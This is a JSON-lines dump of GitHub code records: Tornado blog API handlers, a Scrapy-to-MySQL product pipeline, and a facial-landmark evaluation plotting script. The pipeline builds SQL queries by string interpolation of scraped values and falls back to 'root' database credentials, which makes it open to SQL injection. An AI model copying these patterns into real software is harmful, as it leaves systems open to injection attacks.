"code", "stars": 0, "dataset": "github-code", "pt": "61", "api": [{"api_name": "pyramid.security.Allow", "line_number": 50, "usage_type": "name"}, {"api_name": "cw.database.UserRole.admin", "line_number": 50, "usage_type": "attribute"}, {"api_name": "cw.database.UserRole", "line_number": 50, "usage_type": "name"}, {"api_name": "pyramid.security.Allow", "line_number": 51, "usage_type": "name"}, {"api_name": "cw.database.UserRole.psychologist", "line_number": 51, "usage_type": "attribute"}, {"api_name": "cw.database.UserRole", "line_number": 51, "usage_type": "name"}, {"api_name": "cw.database.User", "line_number": 64, "usage_type": "argument"}, {"api_name": "_shared.schema.map_data_to_body_schema", "line_number": 66, "usage_type": "call"}, {"api_name": "response_schema.ResponseBodyClientSchema", "line_number": 66, "usage_type": "argument"}, {"api_name": 
"cornice.resource.view", "line_number": 54, "usage_type": "call"}, {"api_name": "schema.GetClientSchema", "line_number": 55, "usage_type": "call"}, {"api_name": "cornice.validators.colander_path_validator", "line_number": 56, "usage_type": "name"}, {"api_name": "response_schema.ResponseBodyClientSchema", "line_number": 58, "usage_type": "call"}, {"api_name": "cw.database.User.type", "line_number": 83, "usage_type": "attribute"}, {"api_name": "cw.database.User", "line_number": 83, "usage_type": "name"}, {"api_name": "cw.database.UserType.client", "line_number": 83, "usage_type": "attribute"}, {"api_name": "cw.database.UserType", "line_number": 83, "usage_type": "name"}, {"api_name": "cw.database.User", "line_number": 84, "usage_type": "argument"}, {"api_name": "cw.database.Client", "line_number": 84, "usage_type": "name"}, {"api_name": "sqlalchemy.func.count", "line_number": 86, "usage_type": "call"}, {"api_name": "sqlalchemy.func", "line_number": 86, "usage_type": "name"}, {"api_name": "cw.database.User.id", "line_number": 86, "usage_type": "attribute"}, {"api_name": "cw.database.User", "line_number": 86, "usage_type": "name"}, {"api_name": "_shared.query.apply_filter_sort_range_for_query", "line_number": 87, "usage_type": "call"}, {"api_name": "cw.database.User", "line_number": 87, "usage_type": "argument"}, {"api_name": "_shared.query.generate_range", "line_number": 98, "usage_type": "call"}, {"api_name": "_shared.schema.map_data_to_body_schema", "line_number": 101, "usage_type": "call"}, {"api_name": "response_schema.ResponseBodyClientsSchema", "line_number": 101, "usage_type": "argument"}, {"api_name": "cornice.resource.view", "line_number": 68, "usage_type": "call"}, {"api_name": "schema.GetClientsSchema", "line_number": 69, "usage_type": "call"}, {"api_name": "cornice.validators.colander_validator", "line_number": 70, "usage_type": "name"}, {"api_name": "response_schema.ResponseBodyClientsSchema", "line_number": 72, "usage_type": "call"}, {"api_name": "cw.database.Client", "line_number": 115, "usage_type": "argument"}, {"api_name": "_shared.schema.map_data_to_body_schema", "line_number": 126, "usage_type": "call"}, {"api_name": "response_schema.ResponseBodyClientSchema", "line_number": 126, "usage_type": "argument"}, {"api_name": "cornice.resource.view", "line_number": 103, "usage_type": "call"}, {"api_name": "schema.UpdateClientValidatorSchema", "line_number": 104, "usage_type": "call"}, {"api_name": "cornice.validators.colander_validator", "line_number": 105, "usage_type": "name"}, {"api_name": "response_schema.ResponseBodyClientSchema", "line_number": 107, "usage_type": "call"}, {"api_name": "cw.modules.security.hash_password", "line_number": 138, "usage_type": "call"}, {"api_name": "cw.database.Client", "line_number": 139, "usage_type": "call"}, {"api_name": "pyramid.security.authenticated_userid", "line_number": 141, "usage_type": "call"}, {"api_name": "_shared.schema.map_data_to_body_schema", "line_number": 148, "usage_type": "call"}, {"api_name": "response_schema.ResponseBodyClientSchema", "line_number": 148, "usage_type": "argument"}, {"api_name": "cornice.resource.view", "line_number": 128, "usage_type": "call"}, {"api_name": "schema.CreateClientSchema", "line_number": 129, "usage_type": "call"}, {"api_name": "cornice.validators.colander_body_validator", "line_number": 130, "usage_type": "name"}, {"api_name": "response_schema.ResponseBodyClientSchema", "line_number": 132, "usage_type": "call"}, {"api_name": "cornice.resource.resource", "line_number": 42, "usage_type": 
"call"}, {"api_name": "cw.modules.cornice.negotiation_params", "line_number": 43, "usage_type": "name"}]} +{"seq_id": "43624622045", "text": "# -*- coding: utf-8 -*-\nimport json\nfrom operator import attrgetter\n\nfrom webservice.base import APIHandler\nfrom webservice.tasks.email_tasks import send_email_task\nfrom config import SETTINGS\nfrom models import *\n\nclass DiaryListHandler(APIHandler):\n def get(self, page_num):\n \"\"\"Diary List handler.\n Also support paging.\n\n Args:\n page_num: int\n\n Return:\n diaries: json\n \"\"\"\n diaries = Diary.objects.order_by('-publish_time')[(int(page_num) - 1)*10\n :int(page_num) * 10]\n d = diaries.to_json()\n self.finish(d)\n\n\nclass DiaryDetailHandler(APIHandler):\n def get(self, diary_id):\n \"\"\"Diary Detail handler.\n\n Args:\n diary_id: ObjectID\n\n Return:\n diary: json\n \"\"\"\n diary = Diary.objects(pk=diary_id).first()\n\n d = diary.to_json()\n self.finish(d)\n\n\nclass CategoryListHandler(APIHandler):\n def get(self):\n \"\"\"Category List handler.\n\n Args:\n none\n\n Return:\n categories: json\n \"\"\"\n categories = Category.objects.order_by('-publish_time')\n\n d = categories.to_json()\n self.finish(d)\n\n\nclass CategoryDetailHandler(APIHandler):\n def get(self, category_id):\n \"\"\"Category Detail handler.\n\n Args:\n category_id: ObjectID\n\n Return:\n category: json\n \"\"\"\n category = Category.objects(pk=category_id).first()\n\n category_json = json.loads(category.to_json())\n\n diaries = []\n\n for c in category_json['diaries']:\n diary = Diary.objects(pk=c['$oid']).first()\n\n diaries.append(json.loads(diary.to_json()))\n\n category_json['diaries'] = diaries\n\n d = category_json\n\n self.finish(d)\n\n\nclass TaglListlHandler(APIHandler):\n def get(self):\n \"\"\"Tag List handler.\n\n Args:\n none\n\n Return:\n tags: json\n \"\"\"\n tags = Tag.objects.order_by('-publish_time')\n\n d = tags.to_json()\n self.finish(d)\n\n\nclass TagDetailHandler(APIHandler):\n def get(self, tag_name):\n \"\"\"Tag Detail handler.\n\n Args:\n tag_name: String\n\n Return:\n tag: json\n \"\"\"\n tag = Tag.objects(name=tag_name).first()\n\n d = tag.to_json()\n self.finish(d)\n\n\nclass GalleryListHandler(APIHandler):\n def get(self):\n \"\"\"Gallery List handler.\n\n Args:\n none\n\n Return:\n gallery: json\n \"\"\"\n albums = Gallery.objects.order_by('-publish_time')\n\n d = albums.to_json()\n self.finish(d)\n\n\nclass GalleryDetailHandler(APIHandler):\n def get(self, gallery_id):\n \"\"\"Gallery Detail handler.\n\n Args:\n gallery_id: ObjectID\n\n Return:\n gallery: json\n \"\"\"\n gallery = Gallery.objects(pk=gallery_id).first()\n\n d = gallery.to_json()\n self.finish(d)\n\n\nclass UserProfileHandler(APIHandler):\n def get(self):\n \"\"\"User handler.\n Get all user profile except hashed password.\n\n Args:\n none\n\n Return:\n profile: json\n \"\"\"\n user = User.objects().first()\n\n d = json.loads(user.to_json())\n del d['password']\n\n self.finish(d)\n\n\nclass CommentAddHandler(APIHandler):\n \"\"\" Comment Add AJAX Post Action.\n\n designed for ajax post and send reply email for admin\n\n Args:\n username: guest_name\n did: diary ObjectedId\n email: guest_email\n content: comment content\n\n Return:\n email_status: success\n \"\"\"\n def get(self, *args):\n did = self.get_argument('did')\n name = self.get_argument('username')\n email = self.get_argument('email')\n content = self.get_argument('comment')\n\n\n diary = Diary.objects(pk=did)\n diary_title = diary[0].title\n\n commentEm = CommentEm(\n author = name,\n content = 
content,\n email = email\n )\n diary.update_one(push__comments=commentEm)\n\n comment = Comment(content=content)\n comment.diary = diary[0]\n comment.email = email\n comment.author = name\n comment.save(validate=False)\n\n try:\n send_email_task(SETTINGS['EMAIL'],\n SETTINGS['MAIN_TITLE'] + u'收到了新的评论, 请查收',\n content, did, name, diary_title)\n\n response = json.dumps({'success': 'true'})\n self.finish(response)\n except Exception as e:\n return str(e)\n\n", "repo_name": "ScenK/Dev_Blog_Webservice", "sub_path": "webservice/handlers.py", "file_name": "handlers.py", "file_ext": "py", "file_size_in_byte": 4732, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 13, "dataset": "github-code", "pt": "61", "api": [{"api_name": "webservice.base.APIHandler", "line_number": 10, "usage_type": "name"}, {"api_name": "webservice.base.APIHandler", "line_number": 27, "usage_type": "name"}, {"api_name": "webservice.base.APIHandler", "line_number": 43, "usage_type": "name"}, {"api_name": "webservice.base.APIHandler", "line_number": 59, "usage_type": "name"}, {"api_name": "json.loads", "line_number": 71, "usage_type": "call"}, {"api_name": "json.loads", "line_number": 78, "usage_type": "call"}, {"api_name": "webservice.base.APIHandler", "line_number": 87, "usage_type": "name"}, {"api_name": "webservice.base.APIHandler", "line_number": 103, "usage_type": "name"}, {"api_name": "webservice.base.APIHandler", "line_number": 119, "usage_type": "name"}, {"api_name": "webservice.base.APIHandler", "line_number": 135, "usage_type": "name"}, {"api_name": "webservice.base.APIHandler", "line_number": 151, "usage_type": "name"}, {"api_name": "json.loads", "line_number": 164, "usage_type": "call"}, {"api_name": "webservice.base.APIHandler", "line_number": 170, "usage_type": "name"}, {"api_name": "webservice.tasks.email_tasks.send_email_task", "line_number": 208, "usage_type": "call"}, {"api_name": "config.SETTINGS", "line_number": 208, "usage_type": "name"}, {"api_name": "config.SETTINGS", "line_number": 209, "usage_type": "name"}, {"api_name": "json.dumps", "line_number": 212, "usage_type": "call"}]} +{"seq_id": "31006630974", "text": "# Define your item pipelines here\n#\n# Don't forget to add your pipeline to the ITEM_PIPELINES setting\n# See: https://docs.scrapy.org/en/latest/topics/item-pipeline.html\n\n\n# useful for handling different item types with a single interface\nimport os\nimport datetime\nimport pymysql\nfrom spider.items import *\nfrom spider.util import *\nimport logging\nimport scrapy\nimport time\nfrom scrapy.pipelines.images import ImagesPipeline\n\n\n# see: https://www.osgeo.cn/scrapy/topics/media-pipeline.html\nclass MinioPipeline(ImagesPipeline):\n\n def get_media_requests(self, item, info):\n if item.get('image_url'):\n return scrapy.Request(url=item[\"image_url\"])\n\n def item_completed(self, results, item, info):\n image_paths = [x[\"path\"] for ok, x in results if ok]\n if image_paths:\n item[\"image_url\"] = image_paths[0]\n return item\n\n def file_path(self, request, response=None, info=None, *, item=None):\n return parse_img_url(request.url)\n\n\nclass ProductPipeline:\n\n def __init__(self, db_host, db_port, db_user, db_pwd, db_name):\n self.sub_dir = datetime.date.today().strftime('%Y%m%d')\n self.db_host = db_host\n self.db_port = db_port\n self.db_user = db_user\n self.db_pwd = db_pwd\n self.db_name = db_name\n\n @classmethod\n def from_crawler(cls, crawler):\n return cls(\n db_host=os.environ.get(\"CHAT_DB_HOST\", \"127.0.0.1\"),\n 
db_pwd=os.environ.get(\"CHAT_DB_PWD\", \"root\"),\n db_name=os.environ.get(\"MYSQL_DB_NAME\", \"mall_pms\"),\n db_port=os.environ.get(\"CHAT_DB_PORT\", \"3306\"),\n db_user=os.environ.get(\"CHAT_DB_USER\", \"root\")\n )\n\n def open_spider(self, spider):\n self.db = pymysql.connect(\n host=self.db_host,\n user=self.db_user,\n password=self.db_pwd,\n db=self.db_name,\n charset=\"utf8mb4\",\n cursorclass=pymysql.cursors.DictCursor,\n )\n self.cursor = self.db.cursor()\n\n def close_spider(self, spider):\n self.db.close()\n\n def process_item(self, item, spider):\n try:\n if isinstance(item, CatItem):\n item['is_release'] = 1\n self.send_db(item, 'pms_category', item['id'])\n elif isinstance(item, AttrGroupItem):\n self.send_db(item, 'pms_attr_group', item['id'])\n elif isinstance(item, AttrItem):\n item['is_release'] = 1\n item['type'] = 1\n item['created_at'] = int(time.time())\n item['updated_at'] = int(time.time())\n self.send_db(item, 'pms_attr', item['id'])\n elif isinstance(item, SpuItem):\n item['weight'] = 100\n item['created_at'] = int(time.time())\n item['updated_at'] = int(time.time())\n self.send_db(item, 'pms_spu', item['id'])\n elif isinstance(item, BrandItem):\n item['created_at'] = int(time.time())\n item['updated_at'] = int(time.time())\n item['logo'] = parse_img_url(item['logo'])\n item['cover'] = parse_img_url(item['cover'])\n item['is_release'] = 1\n self.send_db(item, 'pms_brand', item['id'])\n elif isinstance(item, SkuItem):\n item['cover'] = parse_img_url(item['cover'])\n self.send_db(item, 'pms_sku', item['id'])\n elif isinstance(item, AttrValueItem):\n sql = 'select * from pms_attr_value where spu_id=%s and `attr_id`=%s' % (\n item['spu_id'], item['attr_id'])\n self.cursor.execute(sql)\n if not self.cursor.fetchone():\n self.save_db(item, 'pms_attr_value')\n elif isinstance(item, SpuImageItem):\n item['img'] = parse_img_url(item['img'])\n sql = 'select * from pms_spu_image where spu_id=%s and `img`=\"%s\"' % (item['spu_id'], item['img'])\n self.cursor.execute(sql)\n if not self.cursor.fetchone():\n self.save_db(item, 'pms_spu_image')\n elif isinstance(item, SkuImageItem):\n item['img'] = parse_img_url(item['img'])\n sql = 'select * from pms_sku_image where sku_id=%s and `img`=\"%s\"' % (item['sku_id'], item['img'])\n self.cursor.execute(sql)\n if not self.cursor.fetchone():\n self.save_db(item, 'pms_sku_image')\n elif isinstance(item, SkuAttrItem):\n sql = 'select * from pms_sku_attr where sku_id=%s and `attr_id`=%s' % (item['sku_id'], item['attr_id'])\n self.cursor.execute(sql)\n if not self.cursor.fetchone():\n self.save_db(item, 'pms_sku_attr')\n elif isinstance(item, SpuDescItem):\n sql = 'select * from pms_spu_desc where spu_id=%s' % item['spu_id']\n self.cursor.execute(sql)\n if not self.cursor.fetchone():\n self.save_db(item, 'pms_spu_desc')\n elif isinstance(item, AttrRelGroupItem):\n sql = 'select * from pms_attr_rel_group where attr_id=%s and group_id=%s' % (\n item['attr_id'], item['group_id'])\n self.cursor.execute(sql)\n if not self.cursor.fetchone():\n self.save_db(item, 'pms_attr_rel_group')\n else:\n return\n except Exception as e:\n logging.error(item)\n logging.error(e)\n return item\n\n def send_db(self, item, table, pri_id, key='id'):\n sql = 'select * from %s where %s = %s' % (table, key, pri_id)\n self.cursor.execute(sql)\n if not self.cursor.fetchone():\n return self.save_db(item, table)\n\n def save_db(self, item, table):\n keys = item.keys()\n values = tuple(item.values())\n fields = \",\".join(['`' + v + '`' for v in keys])\n temp = 
\",\".join([\"%s\"] * len(keys))\n sql = \"INSERT INTO {} ({}) VALUES ({})\".format(table, fields, temp)\n self.cursor.execute(sql, values)\n return self.db.commit()\n", "repo_name": "binbinly/micro-mall", "sub_path": "seed/spider/spider/pipelines.py", "file_name": "pipelines.py", "file_ext": "py", "file_size_in_byte": 6209, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 3, "dataset": "github-code", "pt": "61", "api": [{"api_name": "scrapy.pipelines.images.ImagesPipeline", "line_number": 20, "usage_type": "name"}, {"api_name": "scrapy.Request", "line_number": 24, "usage_type": "call"}, {"api_name": "datetime.date.today", "line_number": 39, "usage_type": "call"}, {"api_name": "datetime.date", "line_number": 39, "usage_type": "attribute"}, {"api_name": "os.environ.get", "line_number": 49, "usage_type": "call"}, {"api_name": "os.environ", "line_number": 49, "usage_type": "attribute"}, {"api_name": "os.environ.get", "line_number": 50, "usage_type": "call"}, {"api_name": "os.environ", "line_number": 50, "usage_type": "attribute"}, {"api_name": "os.environ.get", "line_number": 51, "usage_type": "call"}, {"api_name": "os.environ", "line_number": 51, "usage_type": "attribute"}, {"api_name": "os.environ.get", "line_number": 52, "usage_type": "call"}, {"api_name": "os.environ", "line_number": 52, "usage_type": "attribute"}, {"api_name": "os.environ.get", "line_number": 53, "usage_type": "call"}, {"api_name": "os.environ", "line_number": 53, "usage_type": "attribute"}, {"api_name": "pymysql.connect", "line_number": 57, "usage_type": "call"}, {"api_name": "pymysql.cursors", "line_number": 63, "usage_type": "attribute"}, {"api_name": "time.time", "line_number": 80, "usage_type": "call"}, {"api_name": "time.time", "line_number": 81, "usage_type": "call"}, {"api_name": "time.time", "line_number": 85, "usage_type": "call"}, {"api_name": "time.time", "line_number": 86, "usage_type": "call"}, {"api_name": "time.time", "line_number": 89, "usage_type": "call"}, {"api_name": "time.time", "line_number": 90, "usage_type": "call"}, {"api_name": "logging.error", "line_number": 135, "usage_type": "call"}, {"api_name": "logging.error", "line_number": 136, "usage_type": "call"}]} +{"seq_id": "11427057092", "text": "import os\nimport h5py\nimport torch\nimport argparse\nimport numpy as np\nimport torch.backends.cudnn as cudnn\nfrom end2end.run_all import E2E, load_pdm, load_hg\nfrom datasets.facial_landmarks import FaceLandmarksEasyTestData, FaceLandmarksHardTestData, FaceLandmarksTrainingData\nfrom torchvision import transforms\nfrom common.transforms import ImageTransform\nfrom torch.utils.data.dataloader import DataLoader\nimport cv2\nfrom tools.visualize_predictions import draw_landmarks, add_description, gallery, add_border\nfrom common.util import mkdir_if_not_exists\nimport json\n\nCOLOR_GT = [255,36,255][::-1]\nCOLOR_HG = [117,206,255][::-1]\nCOLOR_PDM = [36,255,36][::-1]\n\n\ndef sample_mse(predictions, gts):\n return [np.mean((predictions[i] - gts[i]) ** 2) for i in range(gts.shape[0])]\n\n\ndef get_improvements(hg_pred, pdm_pred, gt):\n sample_losses_pdm = sample_mse(pdm_pred.detach().cpu().numpy(), gt.detach().cpu().numpy())\n sample_losses_hg = sample_mse(hg_pred.detach().cpu().numpy(), gt.detach().cpu().numpy())\n improvements = [(i, sample_losses_hg[i], sample_losses_pdm[i], sample_losses_hg[i] / sample_losses_pdm[i]) for i in range(len(sample_losses_hg))]\n sorted_improvements = sorted(improvements, key=lambda x: x[3])\n return sorted_improvements\n\n\ndef 
plot_best_improvements(hg_pred, pdm_pred, gt, images, target, n=10):\n mkdir_if_not_exists(target)\n improvements = get_improvements(hg_pred, pdm_pred, gt)[-n:]\n all_imgs = []\n all_imgs_desc = []\n for rank, (i, hg_err, pdm_err, ratio) in enumerate(improvements[::-1]):\n print(target, i, hg_err, pdm_err, ratio)\n gt_img = draw_landmarks(cv2.cvtColor(images[i], cv2.COLOR_RGB2BGR), gt[i], color=COLOR_GT, size=1)\n cv2.imwrite(os.path.join(target, \"%d_%d_gt_%0.4f_plain.png\" % (rank, i, ratio)), gt_img)\n gt_img_desc = add_description(gt_img, \"GT\")\n cv2.imwrite(os.path.join(target, \"%d_%d_gt_%0.4f_desc.png\" % (rank, i, ratio)), gt_img_desc)\n\n hg_img = draw_landmarks(cv2.cvtColor(images[i], cv2.COLOR_RGB2BGR), hg_pred[i], color=COLOR_HG, size=1)\n cv2.imwrite(os.path.join(target, \"%d_%d_hg_%0.4f_plain.png\" % (rank, i, ratio)), hg_img)\n hg_img_desc = add_description(hg_img, \"HG %0.6f\" % hg_err)\n cv2.imwrite(os.path.join(target, \"%d_%d_hg_%0.4f_desc.png\" % (rank, i, ratio)), hg_img_desc)\n\n pdm_img = draw_landmarks(cv2.cvtColor(images[i], cv2.COLOR_RGB2BGR), pdm_pred[i], color=COLOR_PDM, size=1)\n cv2.imwrite(os.path.join(target, \"%d_%d_pdm_%0.4f_plain.png\" % (rank, i, ratio)), pdm_img)\n pdm_img_desc = add_description(pdm_img, \"PDM %0.6f\" % pdm_err)\n cv2.imwrite(os.path.join(target, \"%d_%d_pdm_%0.4f_desc.png\" % (rank, i, ratio)), pdm_img_desc)\n\n gal_input = [add_border(x, 5) for x in [gt_img, hg_img, pdm_img]]\n cur_all = gallery(np.array(gal_input), 1)\n cv2.imwrite(os.path.join(target, \"%d_%d_all_%0.4f.png\" % (rank, i, ratio)), cur_all)\n\n gal_input_desc = [add_border(x, 5) for x in [gt_img_desc, hg_img_desc, pdm_img_desc]]\n cur_all_desc = gallery(np.array(gal_input_desc), 1)\n cv2.imwrite(os.path.join(target, \"%d_%d_all_desc_%0.4f.png\" % (rank, i, ratio)), cur_all_desc)\n\n all_imgs.append(cur_all)\n all_imgs_desc.append(add_description(cur_all_desc, \" impr. 
%0.4f\" % ratio))\n\n all_imgs = gallery(np.array(all_imgs), len(all_imgs))\n cv2.imwrite(os.path.join(target, \"gallery.png\"), all_imgs)\n\n all_imgs_desc = gallery(np.array(all_imgs_desc), len(all_imgs_desc))\n cv2.imwrite(os.path.join(target, \"gallery_desc.png\"), all_imgs_desc)\n\n\nif __name__ == \"__main__\":\n parser = argparse.ArgumentParser()\n parser.add_argument(\"hg\", type=str, help=\"Path to pretrained hourglass (.torch)\")\n parser.add_argument(\"pdm\", type=str, help=\"Path to pretrained PDM (.torch)\")\n parser.add_argument(\"data\", type=str, help=\"all_data_valid_w_profile_pts.h5\")\n parser.add_argument(\"target\", type=str, help=\"Where to store\")\n parser.add_argument(\"--gpu\", type=int, default=0, help=\"GPU ID\")\n parser.add_argument(\"--n\", type=int, default=10, help=\"N biggest improvements\")\n args = parser.parse_args()\n\n mkdir_if_not_exists(args.target)\n\n gpu_id = args.gpu\n location = 'cpu' if gpu_id < 0 else \"cuda:%d\" % gpu_id\n\n hg, hg_config = load_hg(args.hg, location)\n pdm, pdm_config = load_pdm(args.pdm, location)\n pdm.print_losses = False\n #pdm.test_epochs = 100\n\n torch.autograd.set_detect_anomaly(True) # This makes debugging much easier\n\n if location is not 'cpu':\n torch.cuda.set_device(torch.device(location))\n\n normMean, normStd = FaceLandmarksTrainingData.TRAIN_MEAN, FaceLandmarksTrainingData.TRAIN_STD\n normTransform = transforms.Normalize(normMean, normStd)\n\n transform = transforms.Compose([\n ImageTransform(transforms.ToPILImage()),\n ImageTransform(transforms.ToTensor()),\n ImageTransform(normTransform)\n ])\n\n pin_memory = location != 'cpu'\n num_workers = 8\n\n with h5py.File(args.data, 'r') as f:\n easy_d = FaceLandmarksEasyTestData(f, transform=transform)\n hard_d = FaceLandmarksHardTestData(f, transform=transform)\n\n e2e = E2E(hg, pdm, 64, max(len(easy_d), len(hard_d)))\n\n easy = list(DataLoader(dataset=easy_d, shuffle=False, num_workers=num_workers, pin_memory=pin_memory, batch_size=len(easy_d)))[0]\n hard = list(DataLoader(dataset=hard_d, shuffle=False, num_workers=num_workers, pin_memory=pin_memory, batch_size=len(hard_d)))[0]\n\n easy_gt = easy[\"landmarks\"]\n easy_images = easy[\"image\"]\n hard_gt = hard[\"landmarks\"]\n hard_images = hard[\"image\"]\n\n with torch.no_grad():\n easy_pdm, easy_hg, pdm_3d_easy, pdm_affparam_easy = e2e(easy_images.to(location))\n hard_pdm, hard_hg, pdm_3d_hard, pdm_affparam_hard = e2e(hard_images.to(location))\n\n json.dump({\n \"3d_easy\" : pdm_3d_easy.detach().cpu().numpy().tolist(),\n \"affine_params_easy\" : pdm_affparam_easy.detach().cpu().numpy().tolist(),\n \"3d_hard\" : pdm_3d_hard.detach().cpu().numpy().tolist(),\n \"affine_params_hard\" : pdm_affparam_hard.detach().cpu().numpy().tolist()\n }, open(os.path.join(args.target, \"3dcoords.json\"), \"w\"))\n\n # get unnormalized images in cv2 format\n easy_images_np = easy[\"original_image\"].numpy()\n hard_images_np = hard[\"original_image\"].numpy()\n\n plot_best_improvements(easy_hg, easy_pdm, easy_gt, easy_images_np, os.path.join(args.target, \"easy\"), args.n)\n plot_best_improvements(hard_hg, hard_pdm, hard_gt, hard_images_np, os.path.join(args.target, \"hard\"), args.n)\n\n", "repo_name": "simonhessner/masters-thesis-final", "sub_path": "code/end2end/plot_biggest_improvements.py", "file_name": "plot_biggest_improvements.py", "file_ext": "py", "file_size_in_byte": 6578, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 2, "dataset": "github-code", "pt": "61", "api": [{"api_name": "numpy.mean", 
"line_number": 23, "usage_type": "call"}, {"api_name": "common.util.mkdir_if_not_exists", "line_number": 35, "usage_type": "call"}, {"api_name": "tools.visualize_predictions.draw_landmarks", "line_number": 41, "usage_type": "call"}, {"api_name": "cv2.cvtColor", "line_number": 41, "usage_type": "call"}, {"api_name": "cv2.COLOR_RGB2BGR", "line_number": 41, "usage_type": "attribute"}, {"api_name": "cv2.imwrite", "line_number": 42, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 42, "usage_type": "call"}, {"api_name": "os.path", "line_number": 42, "usage_type": "attribute"}, {"api_name": "tools.visualize_predictions.add_description", "line_number": 43, "usage_type": "call"}, {"api_name": "cv2.imwrite", "line_number": 44, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 44, "usage_type": "call"}, {"api_name": "os.path", "line_number": 44, "usage_type": "attribute"}, {"api_name": "tools.visualize_predictions.draw_landmarks", "line_number": 46, "usage_type": "call"}, {"api_name": "cv2.cvtColor", "line_number": 46, "usage_type": "call"}, {"api_name": "cv2.COLOR_RGB2BGR", "line_number": 46, "usage_type": "attribute"}, {"api_name": "cv2.imwrite", "line_number": 47, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 47, "usage_type": "call"}, {"api_name": "os.path", "line_number": 47, "usage_type": "attribute"}, {"api_name": "tools.visualize_predictions.add_description", "line_number": 48, "usage_type": "call"}, {"api_name": "cv2.imwrite", "line_number": 49, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 49, "usage_type": "call"}, {"api_name": "os.path", "line_number": 49, "usage_type": "attribute"}, {"api_name": "tools.visualize_predictions.draw_landmarks", "line_number": 51, "usage_type": "call"}, {"api_name": "cv2.cvtColor", "line_number": 51, "usage_type": "call"}, {"api_name": "cv2.COLOR_RGB2BGR", "line_number": 51, "usage_type": "attribute"}, {"api_name": "cv2.imwrite", "line_number": 52, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 52, "usage_type": "call"}, {"api_name": "os.path", "line_number": 52, "usage_type": "attribute"}, {"api_name": "tools.visualize_predictions.add_description", "line_number": 53, "usage_type": "call"}, {"api_name": "cv2.imwrite", "line_number": 54, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 54, "usage_type": "call"}, {"api_name": "os.path", "line_number": 54, "usage_type": "attribute"}, {"api_name": "tools.visualize_predictions.add_border", "line_number": 56, "usage_type": "call"}, {"api_name": "tools.visualize_predictions.gallery", "line_number": 57, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 57, "usage_type": "call"}, {"api_name": "cv2.imwrite", "line_number": 58, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 58, "usage_type": "call"}, {"api_name": "os.path", "line_number": 58, "usage_type": "attribute"}, {"api_name": "tools.visualize_predictions.add_border", "line_number": 60, "usage_type": "call"}, {"api_name": "tools.visualize_predictions.gallery", "line_number": 61, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 61, "usage_type": "call"}, {"api_name": "cv2.imwrite", "line_number": 62, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 62, "usage_type": "call"}, {"api_name": "os.path", "line_number": 62, "usage_type": "attribute"}, {"api_name": "tools.visualize_predictions.add_description", "line_number": 65, "usage_type": "call"}, {"api_name": 
"tools.visualize_predictions.gallery", "line_number": 67, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 67, "usage_type": "call"}, {"api_name": "cv2.imwrite", "line_number": 68, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 68, "usage_type": "call"}, {"api_name": "os.path", "line_number": 68, "usage_type": "attribute"}, {"api_name": "tools.visualize_predictions.gallery", "line_number": 70, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 70, "usage_type": "call"}, {"api_name": "cv2.imwrite", "line_number": 71, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 71, "usage_type": "call"}, {"api_name": "os.path", "line_number": 71, "usage_type": "attribute"}, {"api_name": "argparse.ArgumentParser", "line_number": 75, "usage_type": "call"}, {"api_name": "common.util.mkdir_if_not_exists", "line_number": 84, "usage_type": "call"}, {"api_name": "end2end.run_all.load_hg", "line_number": 89, "usage_type": "call"}, {"api_name": "end2end.run_all.load_pdm", "line_number": 90, "usage_type": "call"}, {"api_name": "torch.autograd.set_detect_anomaly", "line_number": 94, "usage_type": "call"}, {"api_name": "torch.autograd", "line_number": 94, "usage_type": "attribute"}, {"api_name": "torch.cuda.set_device", "line_number": 97, "usage_type": "call"}, {"api_name": "torch.cuda", "line_number": 97, "usage_type": "attribute"}, {"api_name": "torch.device", "line_number": 97, "usage_type": "call"}, {"api_name": "datasets.facial_landmarks.FaceLandmarksTrainingData.TRAIN_MEAN", "line_number": 99, "usage_type": "attribute"}, {"api_name": "datasets.facial_landmarks.FaceLandmarksTrainingData", "line_number": 99, "usage_type": "name"}, {"api_name": "datasets.facial_landmarks.FaceLandmarksTrainingData.TRAIN_STD", "line_number": 99, "usage_type": "attribute"}, {"api_name": "torchvision.transforms.Normalize", "line_number": 100, "usage_type": "call"}, {"api_name": "torchvision.transforms", "line_number": 100, "usage_type": "name"}, {"api_name": "torchvision.transforms.Compose", "line_number": 102, "usage_type": "call"}, {"api_name": "torchvision.transforms", "line_number": 102, "usage_type": "name"}, {"api_name": "common.transforms.ImageTransform", "line_number": 103, "usage_type": "call"}, {"api_name": "torchvision.transforms.ToPILImage", "line_number": 103, "usage_type": "call"}, {"api_name": "torchvision.transforms", "line_number": 103, "usage_type": "name"}, {"api_name": "common.transforms.ImageTransform", "line_number": 104, "usage_type": "call"}, {"api_name": "torchvision.transforms.ToTensor", "line_number": 104, "usage_type": "call"}, {"api_name": "torchvision.transforms", "line_number": 104, "usage_type": "name"}, {"api_name": "common.transforms.ImageTransform", "line_number": 105, "usage_type": "call"}, {"api_name": "h5py.File", "line_number": 111, "usage_type": "call"}, {"api_name": "datasets.facial_landmarks.FaceLandmarksEasyTestData", "line_number": 112, "usage_type": "call"}, {"api_name": "datasets.facial_landmarks.FaceLandmarksHardTestData", "line_number": 113, "usage_type": "call"}, {"api_name": "end2end.run_all.E2E", "line_number": 115, "usage_type": "call"}, {"api_name": "torch.utils.data.dataloader.DataLoader", "line_number": 117, "usage_type": "call"}, {"api_name": "torch.utils.data.dataloader.DataLoader", "line_number": 118, "usage_type": "call"}, {"api_name": "torch.no_grad", "line_number": 125, "usage_type": "call"}, {"api_name": "json.dump", "line_number": 129, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 
